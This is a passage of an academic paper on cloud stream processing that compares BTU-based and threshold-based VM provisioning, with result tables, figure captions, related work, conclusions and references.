Near real-time compliance 85% (s = 2%) 90% (s = 1%) 93% (s = 1%) 67% (s = 1%) Relaxed compliance 89% (s = 1%) 93% (s = 1%) 95% (s = 1%) 71% (s = 1%) Resource cost 72.33 (s = 3.79) 92.00 (s = 1.73) 98.00 (s = 3.84) 58.00 (s = 1.73) 79.00 (s = 4.58) 120.00 (s = 6.00) Real-time total cost 158.91 (s = 0.82) 173.39 (s = 0.68) 174.69 (s = 4.25) 151.83 (s = 1.95) 172.83 (s = 4.93) 213.83 (s = 6.45) Near real-time total cost 96.85 (s = 0.39) 108.24 (s = 0.50) 108.88 (s = 3.17) 109.59 (s = 1.77) 130.59 (s = 4.73) 171.59 (s = 6.35) Relaxed total cost 90.96 (s = 1.84) 103.03 (s = 1.04) 105.41 (s = 2.91) 102.97 (s = 1.57) 123.97 (s = 4.49) 164.97 (s = 6.12) Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 24/36 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ this lazy downscaling strategy is a decrease of scaling activities, especially for the BTU30 and BTU60 scenario. This decrease in scaling activities results in a better SLA compliance since the SPE already maintains the processing capabilities for future data volume peaks as this is the case for the stepwise data arrival pattern. This results in high SLA compliance values of over 90% for the BTU30 and BTU60 scenario. It needs to be noted that the lack of active downscaling activities does not increase the cost for computational resources since these resources have already been paid at the beginning of their BTU. The BTU-based downscaling operations are often triggered at suitable times, e.g., around minutes 20 and 38 for the BTU10 configuration or minute 70 for the BTU30 configuration, where the downscaling activities do not impact the SLA compliance. Nevertheless, there are also points in time, when the BTU of a VM coincides with a peak of the data volume, e.g., at minute 30 for the BTU30 configuration. In these situations, the BTU-based approach will initialize the downscaling procedure to release a VM shortly before the end of its BTU. In this specific case around minute 30 for the BTU30 scenario, the downscaling procedure is successful because monitoring does not report any delays for processing based on Algorithm 3 and the VM is triggered to be shut 0 20 40 60 80 100 120 0 2 4 6 8 (A) BTU–based (BTU10) Time (Minutes) M a n u fa ct u ri n g M a ch in e s a n d V M s 0 1 0 2 0 3 0 4 0 5 0 6 0 7 0 O p e ra to r In st a n ce s 0 20 40 60 80 100 120 0 2 4 6 8 (B) BTU–based (BTU30) Time (Minutes) M a n u fa ct u ri n g M a ch in e s a n d V M s 0 1 0 2 0 3 0 4 0 5 0 6 0 7 0 O p e ra to r In st a n ce s 0 20 40 60 80 100 120 0 2 4 6 8 (C) BTU–based (BTU60) Time (Minutes) M a n u fa ct u ri n g M a ch in e s a n d V M s 0 1 0 2 0 3 0 4 0 5 0 6 0 7 0 O p e ra to r In st a n ce s 0 20 40 60 80 100 120 0 2 4 6 8 (D) Threshold–based Time (Minutes) M a n u fa ct u ri n g M a ch in e s a n d V M s 0 1 0 2 0 3 0 4 0 5 0 6 0 7 0 O p e ra to r In st a n ce s Pattern VMs Operator Instances Figure 8 Stepwise pattern. (A) shows the resource provisioning configuration using the BTU-based approach using a BTU of 10 min for the stepwise data arrival pattern; (B) shows the resource provisioning configuration using the BTU-based approach using a BTU of 30 min for the stepwise data arrival pattern; (C) shows the resource provisioning configuration using the BTU-based approach using a BTU of 60 min for the stepwise data arrival pattern; (D) shows the resource provisioning configuration using the threshold-based approach for the 2-level data arrival pattern. Full-size DOI: 10.7717/peerj-cs.141/fig-8 Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 25/36 http://dx.doi.org/10.7717/peerj-cs.141/fig-8 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ down. But in the next reasoning cycle, the SPE realizes the lack of processing capabilities and leases another VM to compensate the resource requirements. Although these non-efficient scaling operations result in a measurable overhead as well as an SLA compliance reduction, the BTU-based approach still achieves a better SLA compliance than the threshold-based approach. Furthermore, it can be seen that the amount of scaling activities for the operator instances is inverse to the length of the BTU. For the BTU10 configuration, it can be observed in Fig. 8A that the level of scaling activities is similar to those of the threshold- based scenario. This results in a rather low SLA compliance, but for the BTU30 and especially the BTU60 there are less downscaling events, i.e., BTU ends, which reduces the need to scale up again to comply with future data volume peaks. Besides the SLA compliance, we also consider the operational cost for data processing. These cost are composed of the resource cost, i.e., the cost for leasing VMs and the penalty cost, which accrue for delayed data processing. In Table 3, it can be seen that the resource cost for the BTU10 and BTU30 configuration are higher than the ones for the threshold-based ones. These higher cost can be explained due to the defensive approach of releasing VMs for the BTU-based approach, which often results in leasing the VM for another BTU based on Algorithm 3. For the BTU60 configuration, the resource cost are around 19% lower than those for the threshold-based configuration. Although the BTU60 configuration uses more computational resources, as shown in Fig. 8C, the overall cost are lower, because the threshold-based approach releases the VMs often prematurely before the end of their BTU, which results in a waste of already paid resources. When we consider only the resource cost, we can see that the BTU-based approach only outperforms the threshold-based approach for the BTU60 configuration. Nevertheless, this situation changes when we also consider the penalty cost, i.e., 1 cost for 10,000 delayed items. After adding the penalty cost and analyzing the total cost for the different compliance scenarios, we can see that only the real-time total cost for the BTU10 configuration is higher than the threshold-based approach. All other scenarios result in slightly less cost for the BTU30 configuration in the real-time scenario and up to a 36% cost-reduction for the near real-time one for the BTU60 configuration. Two-level data arrival pattern The two-level data arrival pattern exhibits the same trend for the SLA compliance and cost for the stepwise data arrival pattern as shown in Table 4. When we analyze the Figs. 9A–9D, we can also see a similar scaling behavior compared to the stepwise data arrival pattern. Nevertheless, there is one notable effect for the BTU60 configuration in Fig. 9C. The BTU-based provisioning approach tends to start more and more operator instances throughout the evaluation run. We can see that after minute 20, when the SPE has enough processing capabilities, the upscaling trigger requests new operator instances from time to time to cope with the data volume. These upscaling operations are most likely due to minor external events, e.g., short network delays due to other applications running on the same physical hardware, which causes the SPE to obtain Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 26/36 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ new processing capabilities. The result of this slow increase of operator instances over time is that the SPE is likely to have more processing capabilities than it actually needs. Nevertheless, at the end of the BTU of a VM, the necessity of these processing capabilities is evaluated, and for example in the BTU60 configuration, the operator instances are cut back around minute 60. After a short recalibration phase between 0 20 40 60 80 100 120 0 2 4 6 8 (A) BTU–based (BTU10) Time (Minutes) M a n u fa ct u ri n g M a ch in e s a n d V M s 0 1 0 2 0 3 0 4 0 5 0 6 0 7 0 O p e ra to r In st a n ce s 0 20 40 60 80 100 120 0 2 4 6 8 (B) BTU–based (BTU30) Time (Minutes) M a n u fa ct u ri n g M a ch in e s a n d V M s 0 1 0 2 0 3 0 4 0 5 0 6 0 7 0 O p e ra to r In st a n ce s 0 20 40 60 80 100 120 0 2 4 6 8 (C) BTU–based (BTU60) Time (Minutes) M a n u fa ct u ri n g M a ch in e s a n d V M s 0 1 0 2 0 3 0 4 0 5 0 6 0 7 0 O p e ra to r In st a n ce s 0 20 40 60 80 100 120 0 2 4 6 8 (D) Threshold–based Time (Minutes) M a n u fa ct u ri n g M a ch in e s a n d V M s 0 1 0 2 0 3 0 4 0 5 0 6 0 7 0 O p e ra to r In st a n ce s Pattern VMs Operator Instances Figure 9 Two-level pattern. (A) shows the resource provisioning configuration using the BTU-based approach using a BTU of 10 min for the 2-level data arrival pattern; (B) shows the resource provisioning configuration using the BTU-based approach using a BTU of 30 min for the 2-level data arrival pattern; (C) shows the resource provisioning configuration using the BTU-based approach using a BTU of 60 min for the 2-level data arrival pattern; (D) shows the resource provisioning configuration using the threshold-based approach for the 2-level data arrival pattern. Full-size DOI: 10.7717/peerj-cs.141/fig-9 Table 4 Evaluation results for two-level scenario. BTU-based Threshold-based BTU10 BTU30 BTU60 BTU10 BTU30 BTU60 Real-time compliance 48% (s = 1%) 50% (s = 1%) 55% (s = 1%) 40% (s = 2%) Near real-time compliance 84% (s = 2%) 88% (s = 0%) 93% (s = 2%) 68% (s = 2%) Relaxed compliance 88% (s = 2%) 91% (s = 0%) 95% (s = 1%) 72% (s = 2%) Resource cost 82.33 (s = 5.13) 96.00 (s = 7.94) 104.00 (s = 6.93) 66.00 (s = 0.00) 86.00 (s = 1.73 122.00 (s = 3.46) Real-time total cost 169.17 (s = 6.83) 177.62 (s = 6.82) 175.90 (s = 4.77) 157.88 (s = 2.64) 177.88 (s = 4.17) 213.88 (s = 4.16) Near real-time total cost 108.35 (s = 6.74) 155.43 (s = 8.18) 114.50 (s = 6.28) 114.62 (s = 3.21) 134.62 (s = 4.19) 170.62 (s = 2.94) Relaxed total cost 102.37 (s = 6.74) 110.62 (s = 8.18) 111.73 (s = 6.28) 108.83 (s = 2.40) 128.83 (s = 3.37) 164.83 (s = 2.59) Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 27/36 http://dx.doi.org/10.7717/peerj-cs.141/fig-9 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ minutes 65 and 75, the SPE follows the same pattern again until the resources are cut back again around minute 120. This mechanism allows the SPE to use the already leased resources, i.e., no additional VMs are leased from minute 80 until 120, to achieve a high resource utilization. Random walk 1 data arrival pattern Based on the numbers of Table 5, we can see that the random walk 1 data arrival pattern follows the same trend for the SLA compliance as well as total cost as the stepwise data arrival pattern. At closer inspection we can see that the SLA compliance is very similar with a deviation of less than 3%. This aspect shows that both the baseline as well as the BTU-based provisioning approach have similar characteristics for the rather simple data arrival pattern, like the stepwise or two-level one, as well as random ones. Based on the Figs. 10A–10D, we can identify one notable difference between the BTU-based and the threshold-based resource provisioning approach. While the operator instance curve and the data volume curve are well aligned for the threshold-based and the BTU10 configuration, we can identify a clear gap for the BTU30 in Fig. 10B and especially for the BTU60 configuration (Fig. 10C). For the latter two configurations, the operator instance curve remains high although the data volume decreases over time. This behavior can be explained due to the optimal resource usage of the already paid resources, which enables the BTU30 and BTU60 configuration to keep the running operator instances without any additional cost. Although this behavior may seem to be a waste of resources at first sight due to the deviation of the actual data volume and the operator instances, it becomes beneficial for the SPE in terms of SLA compliance when the volume rises again, e.g., around minutes 85 or 120. Random walk 2 data arrival pattern The numerical results in terms of the SLA compliance and total cost follow similar trends as for the stepwise data arrival pattern scenario, based on the numbers in Table 6. For this data arrival pattern also only the BTU10 configuration requires more cost than the threshold- based baseline for the real-time scenario. All other configurations and scenarios result in lower cost than the baseline. When we analyze the graphical representation of Figs. 11A–11D Table 5 Evaluation results for random walk 1. BTU-based Threshold-based BTU10 BTU30 BTU60 BTU10 BTU30 BTU60 Real-time compliance 49% (s = 1%) 52% (s = 2%) 54% (s = 0%) 39% (s = 0%) Near real-time compliance 85% (s = 2%) 90% (s = 3%) 93% (s = 0%) 66% (s = 1%) Relaxed compliance 89% (s = 2%) 93% (s = 2%) 95% (s = 1%) 71% (s = 1%) Resource cost 69.33 (s = 3.51) 95.00 (s = 1.73) 110.00 (s = 3.46) 61.33 (s = 1.53) 86.00 (s = 1.73 128.00 (s = 6.93) Real-time total cost 158.19 (s = 4.99) 176.94 (s = 4.70) 185.95 (s = 3.40) 158.68 (s = 1.54) 183.35 (s = 1.40) 225.35 (s = 6.56) Near real-time total cost 94.44 (s = 6.14) 111.43 (s = 5.65) 121.61 (s = 2.89) 115.55 (s = 1.14) 140.22 (s = 1.77) 182.22 (s = 6.88) Relaxed total cost 88.11 (s = 5.86) 106.67 (s = 4.69) 117.91 (s = 3.16) 107.54 (s = 1.47) 132.21 (s = 2.14) 174.21 (s = 7.25) Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 28/36 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ for the random walk 2 data arrival pattern, the most prominent difference in contrast to the random walk 1 data arrival pattern is the even better alignment of the operator instance and data volume curves. This is due to the fact that the data volume is rising for the second part of the evaluation, i.e., after minute 40, and the already paid resources can be actively used for data processing instead of only serving as free backup processing capabilities. 0 20 40 60 80 100 120 0 2 4 6 8 Time (Minutes) M a n u fa ct u ri n g M a ch in e s a n d V M s 0 1 0 2 0 3 0 4 0 5 0 6 0 7 0 O p e ra to r In st a n ce s 0 20 40 60 80 100 120 0 2 4 6 8 Time (Minutes) M a n u fa ct u ri n g M a ch in e s a n d V M s 0 1 0 2 0 3 0 4 0 5 0 6 0 7 0 O p e ra to r In st a n ce s 0 20 40 60 80 100 120 0 2 4 6 8 Time (Minutes) M a n u fa ct u ri n g M a ch in e s a n d V M s 0 1 0 2 0 3 0 4 0 5 0 6 0 7 0 O p e ra to r In st a n ce s 0 20 40 60 80 100 120 0 2 4 6 8 Time (Minutes) M a n u fa ct u ri n g M a ch in e s a n d V M s 0 1 0 2 0 3 0 4 0 5 0 6 0 7 0 O p e ra to r In st a n ce s Pattern VMs Operator Instances (A) BTU–based (BTU10) (B) BTU–based (BTU30) (C) BTU–based (BTU60) (D) Threshold–based Figure 10 Random walk pattern 1. (A) shows the resource provisioning configuration using the BTU-based approach using a BTU of 10 min for the random walk data arrival pattern 1; (B) shows the resource provisioning configuration using the BTU-based approach using a BTU of 30 min for the random walk data arrival pattern 1; (C) shows the resource provisioning configuration using the BTU-based approach using a BTU of 60 min for the random walk data arrival pattern 1; (D) shows the resource provisioning configuration using the threshold-based approach for the random walk data arrival pattern 1. Full-size DOI: 10.7717/peerj-cs.141/fig-10 Table 6 Evaluation results for random walk 2. BTU-based Threshold-based BTU10 BTU30 BTU60 BTU10 BTU30 BTU60 Real-time compliance 49% (s = 2%) 51% (s = 1%) 53% (s = 0%) 41% (s = 1%) Near real-time compliance 87% (s = 2%) 90% (s = 1%) 92% (s = 1%) 70% (s = 1%) Relaxed compliance 90% (s = 2%) 94% (s = 1%) 95% (s = 0%) 75% (s = 75%) Resource cost 74.00 (s = 6.08) 90.00 (s = 0.00) 106.00 (s = 3.46) 59.67 (s = 4.04) 82.00 (s = 9.17 118.00 (s = 9.17) Real-time total cost 172.67 (s = 5.35) 184.03 (s = 0.99) 195.73 (s = 3.33) 164.18 (s = 3.84) 187.41 (s = 9.88) 223.41 (s = 9.88) Near real-time total cost 100.17 (s = 6.65) 108.91 (s = 2.47) 120.59 (s = 3.59) 113.41 (s = 3.47) 135.98 (s = 9.93) 171.98 (s = 9.93) Relaxed total cost 92.67 (s = 7.15) 101.96 (s = 1.61) 115.67 (s = 3.48) 104.43 (s = 2.49) 127.19 (s = 8.29) 163.19 (s = 8.29) Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 29/36 http://dx.doi.org/10.7717/peerj-cs.141/fig-10 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ Furthermore, it can be seen that the BTU-based approach requires less scaling activities between minute 60 and 120 in contrast to the threshold-based approach in Fig. 11D. This is again due to the lazy release characteristics of the BTU-based approach, which result in a higher SLA compliance in contrast to the threshold-based approach. Evaluation conclusion When we compare the evaluation results of the four different data arrival patterns, we can see that they all share the same trend. Regarding the SLA compliance, we can see that the BTU-based approach achieves a better SLA compliance for all configurations for all compliance scenarios. Furthermore, the SLA values are roughly the same (with a maximum deviation of 3%) across all data arrival patterns despite their different characteristics. For the total cost, we can also see that only the BTU10 configuration for the real-time scenario results in higher cost in contrast to the baseline. All other configurations and scenarios for the BTU-based approach exhibit a cost reduction. Additionally it must be noted that the resource cost are always lower for the BTU60 configuration than for the threshold-based approach. 0 20 40 60 80 100 120 0 2 4 6 8 Time (Minutes) M a n u fa ct u ri n g M a ch in e s a n d V M s 0 1 0 2 0 3 0 4 0 5 0 6 0 7 0 O p e ra to r In st a n ce s 0 20 40 60 80 100 120 0 2 4 6 8 Time (Minutes) M a n u fa ct u ri n g M a ch in e s a n d V M s 0 1 0 2 0 3 0 4 0 5 0 6 0 7 0 O p e ra to r In st a n ce s 0 20 40 60 80 100 120 0 2 4 6 8 Time (Minutes) M a n u fa ct u ri n g M a ch in e s a n d V M s 0 1 0 2 0 3 0 4 0 5 0 6 0 7 0 O p e ra to r In st a n ce s 0 20 40 60 80 100 120 0 2 4 6 8 Time (Minutes) M a n u fa ct u ri n g M a ch in e s a n d V M s 0 1 0 2 0 3 0 4 0 5 0 6 0 7 0 O p e ra to r In st a n ce s Pattern VMs Operator Instances (A) BTU–based (BTU10) (B) BTU–based (BTU30) (C) BTU–based (BTU60) (D) Threshold–based Figure 11 Random walk pattern 2. (A) shows the resource provisioning configuration using the BTU-based approach using a BTU of 10 min for the random walk data arrival pattern 2; (B) shows the resource provisioning configuration using the BTU-based approach using a BTU of 30 min for the random walk data arrival pattern 2; (C) shows the resource provisioning configuration using the BTU-based approach using a BTU of 60 min for the random walk data arrival pattern 2; (D) shows the resource provisioning configuration using the threshold-based approach for the random walk data arrival pattern 2. Full-size DOI: 10.7717/peerj-cs.141/fig-11 Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 30/36 http://dx.doi.org/10.7717/peerj-cs.141/fig-11 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ We can also observe that the compliance for real-time data processing on cloud infrastructures is rather low, i.e., around 40% for the baseline and around 50–55% for the BTU-based approach. This is mainly due to the fact that cloud environments are often influenced by other applications running on the same physical hardware. This can result in minor data transmission or processing delays that have a severe impact on the SLA compliance. Nevertheless, we can see that for the near real-time and relaxed time scenarios, the SLA compliance ranges from 84% to 95% for the BTU-based approach, which meets the requirements of our motivational scenario discussed in “Motivation.” Threats to applicability Although the presented system model builds on top of real-world observations, it cannot be guaranteed that all external aspects are adequately considered in our system model which may result in a non-optimal performance in real-world deployments. Nevertheless, we consider this risk as rather small, since we have already conducted our evaluations in a cloud-based testbed, which already considers external influences by other applications running on the same cloud environment. To consider such external effects for the evaluation, we repeated each evaluation scenario and configuration three times on different days (including the weekend) to cover different usage scenario on the OpenStack-based cloud due to other stakeholders on the same physical hardware. RELATED WORK In the last couple of years, the landscape of SPEs has been constantly increasing. In contrast to the rather basic SPEs, like Aurora (Balakrishnan et al., 2004) or Borealis (Abadi et al., 2005), which have been designed more than a decade ago, today’s SPEs incorporate technological advances like cloud computing and can process large volumes of data in parallel. While some of these SPEs are rather focused on cluster-based deployments, like System S (Gedik et al., 2008), most are designed to utilize cloud-based deployments, like Apache Spark (Zaharia et al., 2010), Apache Flink (Carbone et al., 2015), Apache Storm (Toshniwal et al., 2014) or its derivative Heron (Kulkarni et al., 2015). Despite the focus on designing efficient SPEs, the resource elasticity aspects of individual operator instances (or workers) have only been picked up recently, e.g., for Apache Spark Streaming or the automatic reconfiguration for Apache Storm based on hints for the number of workers. To the best of our knowledge there exists no established SPEs which consider a two-level resource provisioning architecture, since most SPEs outsource this functionality to other frameworks like Apache Mesos or Kubernetes. However, there are a couple of prototypes and concepts in the literature, which propose a mechanism for elastic stream processing. Several research groups have picked up the challenge of replacing the previously dominant strategy of data quality degradation, i.e., load shedding (Babcock, Datar & Motwani, 2004; Tatbul, Çetintemel & Zdonik, 2007), with resource elasticity. Nevertheless, most of the first publications focus on an optimal resource configuration only when deploying a topology and do not consider any updates at runtime, e.g., Setty et al. (2014) for pub/sub systems or Florescu & Kossmann (2009) for database systems. The next step Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 31/36 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ toward resource elasticity was proposed by Lim, Han & Babu (2013), who proposed the redeployment of complete applications for database management systems whenever the resource requirements change. Although this approach already supports resource elasticity, it was required to refine this approach to only consider operator instances instead of complete applications. One of the first publications in the domain of data stream processing was authored by Schneider et al. (2009), which proposed the parallelization of stream processing operations with System S. Because this first approach only considered stateless operators, the authors complemented their approach in a succeeding publication to consider the replication of stateful operators (Gedik et al., 2014). Besides the elasticity extension to System S, there are also several proposed extensions to Apache Storm, which replace the default scheduler with custom implementations to optimize the parallelization of operators as well as the placement thereof on different computational resources. Two of these approaches have been presented by Aniello, Baldoni & Querzoni (2013) and Xu et al. (2014). These two publications present threshold-based custom schedulers, which can adopt the topology deployment at runtime, depending on the incoming data volume and the actual load for Apache Storm. Although any replication of a specific operator provides additional processing capabilities, it needs to be noted that any reconfiguration of the topology enactment has a negative impact on the processing performance. To minimize these reconfiguration aspects, Stela (Xu, Peng & Gupta, 2016), introduces new performance indicators to focus on the actual throughput of the SPE and to reduce any reconfiguration aspects. To extend the rather static aspect of the threshold-based scaling approaches, Heinze et al. (2015) propose a threshold-based resource optimization, whose thresholds are adopted based on an online learning mechanism within a custom SPE. This allows resource optimization to adapt the otherwise fixed thresholds, which are predefined before the topology enactment, at runtime to improve the resource utilization based on actual monitoring data. SEEP (Castro Fernandez et al., 2013), another custom SPE, also proposes a simple threshold-based replication mechanism. In contrast to the other already discussed approaches, SEEP focuses on stateful operators and employs a dedicated fault tolerance mechanism. Besides the basic replication approaches, there are also some works that optimize specific aspects for the topology enactment. One of these aspects is the partitioning of data to optimize the data flow among the operators, especially regarding stateful operators. The Streamcloud (Gulisano et al., 2012) SPE proposes a mechanism to partition the incoming data to distribute it efficiently among different replicas of one operator type. Another approach for optimizing the overall efficiency of a topology enactment is to optimize the placement of operators within a potential heterogeneous pool of computational resources. Cardellini et al. (2015) propose an extension to Apache Storm, which considers an optimal placement of operators in terms of SLA-based criteria on different cloud resources. Furthermore, De Matteis & Mencagli (2016) present a predictive approach to minimize the latency and improve the energy efficiency of the SPE. This approach allows to reduce the reconfiguration of SPEs, which is also one of the objectives in our approach. The last notable approach for optimizing the topology enactment on Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 32/36 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ cloud resources is to optimize the deployment of operators according to their specific processing tasks. Hanna et al. (2016) consider different types of VMs, e.g., with an emphasis on CPU or GPU, and optimize the deployment based on the suitability of these machines to conduct specific operations, e.g., matrix multiplications are significantly faster when executed on the GPU. Although the literature already provides different optimization approaches, to the best of our knowledge, none of these approaches considers the BTU aspect of VMs when optimizing processing resources as proposed in this paper. Also, most of the discussed approaches only aim at optimizing the amount of replicas for processing operators, but do ignore the reconfiguration overhead during the topology enactment. CONCLUSION Within this paper, we have discussed the most important requirements for optimizing data stream processing in volatile environments. Based on these requirements, we have developed an extensive system model for which we have presented a BTU-based optimization approach. This optimization approach has been evaluated with four different data arrival pattern against a threshold-based approach, which already provides a significant cost reduction based on our previous work (Hochreiner et al., 2016a). The evaluation has shown that the BTU-based approach results in a better SLA compliance which also achieves a better overall cost structure compared to the threshold-based approach. Nevertheless, as a result of the evaluation, we have also identified a potential extension possibility for our BTU-based approach, namely the addition of a more sophisticated predictive component. So far we only consider the trend for upscaling operator instances, but we do not consider historical information nor other monitoring information, e.g., as suggested by Copil et al. (2016), for downscaling purposes, which could yield even better results. In our future work, we plan to also apply our BTU-based approach to hybrid clouds. This requires an extension of the optimization model regarding the networking capabilities among these clouds. Furthermore, we plan to investigate the structural properties of the topology in more detail, e.g., to identify critical paths or high volume operators, such as the operators O2 and O6 in our topology. These insights may help us to apply different scaling priorities, especially for downscaling operations to avoid oscillating effects. In addition we also plan to evaluate the impact of using the individual weights W1–W4 in Algorithm 3 within both private and hybrid clouds. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work is supported by TU Wien research funds and by the Commission of the European Union within the CREMA H2020-RIA project (Grant agreement no. 637066). There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 33/36 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ Grant Disclosures The following grant information was disclosed by the authors: TU Wien research funds and by the Commission of the European Union within the CREMA H2020-RIA project: 637066. Competing Interests Schahram Dustdar and Stefan Schulte are Academic Editors for PeerJ. Author Contributions � Christoph Hochreiner conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. � Michael Vögler conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. � Stefan Schulte wrote the paper, reviewed drafts of the paper. � Schahram Dustdar reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: The source code repositories for the prototype implementation, evaluation tools as well as the raw data for the evaluation can be found in the VISP-streaming project: https://github.com/visp-streaming. REFERENCES Abadi DJ, Ahmad Y, Balazinska M, Cetintemel U, Cherniack M, Hwang J-H, Lindner W, Maskey A, Rasin A, Ryvkina E. 2005. The design of the Borealis stream processing engine. In: Conference on Innovative Data Systems Research, Asilomar, CA, USA, 277–289. Andonov R, Poirriez V, Rajopadhye S. 2000. Unbounded knapsack problem: dynamic programming revisited. European Journal of Operational Research 123(2):394–407 DOI 10.1016/s0377-2217(99)00265-9. Aniello L, Baldoni R, Querzoni L. 2013. Adaptive online scheduling in storm. In: 7th International Conference on Distributed Event-Based Systems (DEBS), Arlington, TX, USA. New York: ACM, 207–218. Armbrust M, Fox A, Griffith R, Joseph AD, Katz R, Konwinski A, Lee G, Patterson D, Rabkin A, Stoica I, Zaharia M. 2010. A view of cloud computing. Communications of the ACM 53(4):50–58 DOI 10.1145/1721654.1721672. Babcock B, Datar M, Motwani R. 2004. Load shedding for aggregation queries over data streams. In: 20th International Conference on Data Engineering, Boston, MA, USA. Piscataway: IEEE, 350–361. Balakrishnan H, Balazinska M, Carney D, Çetintemel U, Cherniack M, Convey C, Galvez E, Salz J, Stonebraker M, Tatbul N, Tibbetts R, Zdonik S. 2004. Retrospective on aurora. International Journal on Very Large Data Bases 13(4):370–383 DOI 10.1007/s00778-004-0133-5. Carbone P, Katsifodimos A, Ewen S, Markl V, Haridi S, Tzoumas K. 2015. Apache flink: stream and batch processing in a single engine. Data Engineering Bulletin 38(4):28–38. Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 34/36 https://github.com/visp-streaming http://dx.doi.org/10.1016/s0377-2217(99)00265-9 http://dx.doi.org/10.1145/1721654.1721672 http://dx.doi.org/10.1007/s00778-004-0133-5 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ Cardellini V, Grassi V, Lo Presti F, Nardelli M. 2015. Distributed QoS-aware scheduling in storm. In: 9th International Conference on Distributed Event-Based Systems (DEBS), Oslo, Norway. New York: ACM, 344–347. Castro Fernandez R, Migliavacca M, Kalyvianaki E, Pietzuch P. 2013. Integrating scale out and fault tolerance in stream processing using operator state management. In: International Conference on Management of Data (SIGMOD), New York, NY, USA. New York: ACM, 725–736. Copil G, Moldovan D, Truong H-L, Dustdar S. 2016. rSYBL: a framework for specifying and controlling cloud services elasticity. ACM Transactions on Internet Technology 16(3):1–20 DOI 10.1145/2925990. De Matteis T, Mencagli G. 2016. Keep calm and react with foresight: strategies for low-latency and energy-efficient elastic data stream processing. In: 21st ACM SIGPLAN Symposium on Principles and Practice of Parallel Programming, Barcelona, Spain. New York: ACM, 1–12. Florescu D, Kossmann D. 2009. Rethinking cost and performance of database systems. ACM Sigmod Record 38(1):43–48 DOI 10.1145/1558334.1558339. Gedik B, Andrade H, Wu K-L, Yu PS, Doo M. 2008. SPADE: the system S declarative stream processing engine. In: International Conference on Management of Data (SIGMOD), Vancouver, BC, Canada. New York: ACM, 1123–1134. Gedik B, Schneider S, Hirzel M, Wu K-L. 2014. Elastic scaling for data stream processing. Transactions on Parallel and Distributed Systems 25(6):1447–1463 DOI 10.1109/tpds.2013.295. Genaud S, Gossa J. 2011. Cost-wait trade-offs in client-side resource provisioning with elastic clouds. In: International Conference on Cloud computing (CLOUD), Washington, DC, USA. Piscataway: IEEE, 1–8. Gulisano V, Jimenez-Peris R, Patino-Martinez M, Soriente C, Valduriez P. 2012. Streamcloud: an elastic and scalable data streaming system. IEEE Transactions on Parallel and Distributed Systems 23(12):2351–2365 DOI 10.1109/tpds.2012.24. Hanna F, Marchal L, Nicod J-M, Philippe L, Rehn-Sonigo V, Sabbah H. 2016. Minimizing rental cost for multiple recipe applications in the cloud. In: International Parallel and Distributed Processing Symposium Workshops (IPDPSW), Chicago, IL, USA. Piscataway: IEEE, 28–37. Heinze T, Roediger L, Meister A, Ji Y, Jerzak Z, Fetzer C. 2015. Online parameter optimization for elastic data stream processing. In: 6th ACM Symposium on Cloud Computing. New York: ACM, 276–287. Hindman B, Konwinski A, Zaharia M, Ghodsi A, Joseph AD, Katz RH, Shenker S, Stoica I. 2011. Mesos: a platform for fine-grained resource sharing in the data center. In: 8th USENIX Conference on Networked Systems Design and Implementation (NSDI), Boston, MA, USA. Berkeley: USENIX Association, 22. Hochreiner C. 2017. VISP testbed—a toolkit for modeling and evaluating resource provisioning algorithms for stream processing applications. In: Kopp O, Lenhard J, Pautasso C, eds. In: 9th ZEUS Workshop (ZEUS 2017), Lugano, Switzerland. CEUR-WS, 37–43. Hochreiner C, Schulte S, Dustdar S, Lecue F. 2015. Elastic stream processing for distributed environments. IEEE Internet Computing 19(6):54–59 DOI 10.1109/mic.2015.118. Hochreiner C, Vögler M, Schulte S, Dustdar S. 2016a. Elastic stream processing for the internet of things. In: 9th International Conference on Cloud Computing (CLOUD), San Francisco, CA, USA. Pisacataway: IEEE, 100–107. Hochreiner C, Vögler M, Waibel P, Dustdar S. 2016b. VISP: an ecosystem for elastic data stream processing for the internet of things. In: 20th International Enterprise Distributed Object Computing Conference (EDOC), Vienna, Austria. Pisacataway: IEEE, 19–29. Hochreiner et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.141 35/36 http://dx.doi.org/10.1145/2925990 http://dx.doi.org/10.1145/1558334.1558339 http://dx.doi.org/10.1109/tpds.2013.295 http://dx.doi.org/10.1109/tpds.2012.24 http://dx.doi.org/10.1109/mic.2015.118 http://dx.doi.org/10.7717/peerj-cs.141 https://peerj.com/computer-science/ Hoenisch P, Schuller D, Schulte S, Hochreiner C, Dustdar S. 2016. Optimization of complex elastic processes. Transactions on Services Computing 9(5):700–713 DOI 